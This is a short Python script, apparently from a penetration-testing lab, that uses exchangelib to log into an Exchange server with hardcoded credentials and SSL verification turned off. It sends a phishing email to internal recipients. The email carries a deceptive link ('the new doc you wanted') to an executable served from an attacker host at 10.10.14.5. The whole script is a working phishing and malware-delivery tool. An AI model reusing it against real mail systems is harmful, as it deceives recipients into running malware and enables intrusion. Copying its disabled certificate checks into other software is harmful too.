Using Python to send emails via the Outlook web interface

send-mail.py

# pip install exchangelib
from exchangelib import Configuration, Credentials, Account, Message, Mailbox, FileAttachment,DELEGATE, HTMLBody
import sys, json

# bypass SSL
from exchangelib.protocol import BaseProtocol, NoVerifyHTTPAdapter
BaseProtocol.HTTP_ADAPTER_CLS = NoVerifyHTTPAdapter

if __name__ == "__main__":
    U = 'LAB\\myuser'
    P = 'England1950'

    malicious_payload_url = "http://10.10.14.5:8080/payload.x64.exe"

    ews_url = 'https://10.10.10.10/EWS/Exchange.asmx'
    ews_auth_type = 'NTLM'
    primary_smtp_address = 'myuser@lab.local'

    cred = Credentials(U, P)
    config = Configuration(service_endpoint=ews_url, credentials=cred, auth_type=ews_auth_type)
    acc = Account(
        primary_smtp_address=primary_smtp_address, 
        config=config, autodiscover=False, 
        access_type=DELEGATE,
    )

    m = Message(
        account=acc,
        subject='Getting back to you',
        #body= '',
        body = HTMLBody(f'<html><body><a href="{malicious_payload_url}">Hi, this is the new doc you wanted.. Glhf</a></body></html>'),
        to_recipients=[
            Mailbox(email_address='target@lab.local'),
            Mailbox(email_address='another@lab.local'),
        ],
        cc_recipients=[
		     # Mailbox(email_address='another@lab.local'),
        ],
        #bcc_recipients=['another_mail@gmail.com']  # you can use just a string list.
    )
    #m.attach(FileAttachment(name='C:\\Temp\\payload.txt', content='string'.encode('utf-8')))
    m.send()